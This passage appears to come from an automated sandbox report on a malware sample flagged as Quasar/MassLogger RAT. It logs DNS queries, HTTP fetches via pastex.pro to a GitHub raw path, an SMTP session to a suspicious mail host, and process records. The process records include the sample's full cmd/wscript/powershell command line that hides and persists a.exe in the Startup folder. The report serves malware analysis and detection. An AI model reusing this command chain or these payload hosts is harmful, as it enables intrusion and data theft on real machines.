                                                                                                                                                            Feb 22, 2021 20:36:35.435549021 CET6420653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:35.495372057 CET53642068.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:36.516894102 CET5090453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:36.574115038 CET53509048.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:37.390105009 CET5752553192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:37.447454929 CET53575258.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:37:00.909001112 CET5381453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:37:00.969053984 CET53538148.8.8.8192.168.2.4

                                                                                                                                                            ICMP Packets

                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                            Feb 22, 2021 20:35:56.991658926 CET192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Feb 22, 2021 20:34:52.415822029 CET192.168.2.48.8.8.80x8967Standard query (0)www.seyranikenger.com.trA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.390264988 CET192.168.2.48.8.8.80xfa17Standard query (0)pastex.proA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.654545069 CET192.168.2.48.8.8.80x1e8bStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.430989027 CET192.168.2.48.8.8.80x304Standard query (0)pastex.proA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.674863100 CET192.168.2.48.8.8.80x5c3dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.741672993 CET192.168.2.48.8.8.80xdabeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.854551077 CET192.168.2.48.8.8.80xfeb3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:55.892837048 CET192.168.2.48.8.8.80x8561Standard query (0)pastex.proA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:56.932419062 CET192.168.2.48.8.8.80x8561Standard query (0)pastex.proA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:57.158576965 CET192.168.2.48.8.8.80xb744Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:26.419395924 CET192.168.2.48.8.8.80x2f9fStandard query (0)smtp.saleforceconsults.comA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.475675106 CET192.168.2.48.8.8.80x2f9fStandard query (0)smtp.saleforceconsults.comA (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.767416954 CET192.168.2.48.8.8.80xb879Standard query (0)smtp.saleforceconsults.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Feb 22, 2021 20:34:52.636853933 CET8.8.8.8192.168.2.40x8967No error (0)www.seyranikenger.com.trseyranikenger.com.trCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:34:52.636853933 CET8.8.8.8192.168.2.40x8967No error (0)seyranikenger.com.tr185.162.146.6A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.495822906 CET8.8.8.8192.168.2.40xfa17No error (0)pastex.pro45.148.121.68A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.705847025 CET8.8.8.8192.168.2.40x1e8bNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.705847025 CET8.8.8.8192.168.2.40x1e8bNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.705847025 CET8.8.8.8192.168.2.40x1e8bNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:02.705847025 CET8.8.8.8192.168.2.40x1e8bNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.490880966 CET8.8.8.8192.168.2.40x304No error (0)pastex.pro45.148.121.68A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.723582983 CET8.8.8.8192.168.2.40x5c3dNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.723582983 CET8.8.8.8192.168.2.40x5c3dNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.723582983 CET8.8.8.8192.168.2.40x5c3dNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:26.723582983 CET8.8.8.8192.168.2.40x5c3dNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.48.44A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.140.41A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.189.250A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.96.218A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET8.8.8.8192.168.2.40xdabeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.76.253A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.48.44A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.140.41A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.189.250A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.96.218A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET8.8.8.8192.168.2.40xfeb3No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.76.253A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:56.989854097 CET8.8.8.8192.168.2.40x8561No error (0)pastex.pro45.148.121.68A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:56.991533995 CET8.8.8.8192.168.2.40x8561No error (0)pastex.pro45.148.121.68A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:57.207247972 CET8.8.8.8192.168.2.40xb744No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:57.207247972 CET8.8.8.8192.168.2.40xb744No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:57.207247972 CET8.8.8.8192.168.2.40xb744No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:35:57.207247972 CET8.8.8.8192.168.2.40xb744No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET8.8.8.8192.168.2.40x2f9fNo error (0)smtp.saleforceconsults.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET8.8.8.8192.168.2.40x2f9fNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET8.8.8.8192.168.2.40x2f9fNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET8.8.8.8192.168.2.40x2f9fNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET8.8.8.8192.168.2.40x2f9fNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET8.8.8.8192.168.2.40xb879No error (0)smtp.saleforceconsults.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET8.8.8.8192.168.2.40xb879No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET8.8.8.8192.168.2.40xb879No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET8.8.8.8192.168.2.40xb879No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET8.8.8.8192.168.2.40xb879No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • pastex.pro
                                                                                                                                                            • api.ipify.org

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.44973945.148.121.6880C:\ProgramData\a.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 22, 2021 20:35:02.584227085 CET1467OUTGET /b/AEmdBGcmp HTTP/1.1
                                                                                                                                                            Host: pastex.pro
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 22, 2021 20:35:02.643884897 CET1467INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Date: Mon, 22 Feb 2021 19:35:02 GMT
                                                                                                                                                            Server: LiteSpeed


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.44974745.148.121.6880C:\ProgramData\a.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 22, 2021 20:35:26.578821898 CET2090OUTGET /b/AEmdBGcmp HTTP/1.1
                                                                                                                                                            Host: pastex.pro
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 22, 2021 20:35:26.635423899 CET2091INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Date: Mon, 22 Feb 2021 19:35:26 GMT
                                                                                                                                                            Server: LiteSpeed


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.44975154.225.220.11580C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 22, 2021 20:35:46.221090078 CET2707OUTGET / HTTP/1.1
                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 22, 2021 20:35:46.361371994 CET2708INHTTP/1.1 200 OK
                                                                                                                                                            Server: Cowboy
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Vary: Origin
                                                                                                                                                            Date: Mon, 22 Feb 2021 19:35:46 GMT
                                                                                                                                                            Content-Length: 11
                                                                                                                                                            Via: 1.1 vegur
                                                                                                                                                            Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38
                                                                                                                                                            Data Ascii: 84.17.52.38


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.44975445.148.121.6880C:\ProgramData\a.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Feb 22, 2021 20:35:57.087357998 CET2755OUTGET /b/AEmdBGcmp HTTP/1.1
                                                                                                                                                            Host: pastex.pro
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 22, 2021 20:35:57.143479109 CET2755INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Date: Mon, 22 Feb 2021 19:35:57 GMT
                                                                                                                                                            Server: LiteSpeed


                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            Feb 22, 2021 20:34:52.822681904 CET185.162.146.6443192.168.2.449731CN=webdisk.seyranikenger.com.tr CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 02 09:19:01 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 02 10:19:01 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                            Feb 22, 2021 20:35:02.844924927 CET185.199.108.133443192.168.2.449741CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                                                            CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                            Feb 22, 2021 20:35:26.871342897 CET185.199.108.133443192.168.2.449748CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                                                            CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                            Feb 22, 2021 20:35:57.410118103 CET185.199.108.133443192.168.2.449755CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                                                            CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028

                                                                                                                                                            SMTP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                            Feb 22, 2021 20:36:28.710617065 CET58749761208.91.199.223192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                                            Feb 22, 2021 20:36:28.711088896 CET49761587192.168.2.4208.91.199.223EHLO 715575
                                                                                                                                                            Feb 22, 2021 20:36:28.877445936 CET58749761208.91.199.223192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                                                                                            250-PIPELINING
                                                                                                                                                            250-SIZE 41648128
                                                                                                                                                            250-VRFY
                                                                                                                                                            250-ETRN
                                                                                                                                                            250-STARTTLS
                                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                                            250-8BITMIME
                                                                                                                                                            250 DSN
                                                                                                                                                            Feb 22, 2021 20:36:28.877710104 CET49761587192.168.2.4208.91.199.223STARTTLS
                                                                                                                                                            Feb 22, 2021 20:36:29.041897058 CET58749761208.91.199.223192.168.2.4220 2.0.0 Ready to start TLS

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:20:34:46
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0xf00000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:34:52
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\ProgramData\a.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\PROGRAMDATA\a.exe
                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 8%, Metadefender, Browse
                                                                                                                                                            • Detection: 28%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:04
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                                                                                                                                                            Imagebase:0x11d0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:05
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:05
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:timeout 4
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:26112 bytes
                                                                                                                                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:10
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                            File size:147456 bytes
                                                                                                                                                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:12
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                            File size:430592 bytes
                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:22
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                                                                                                                                                            Imagebase:0x540000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security
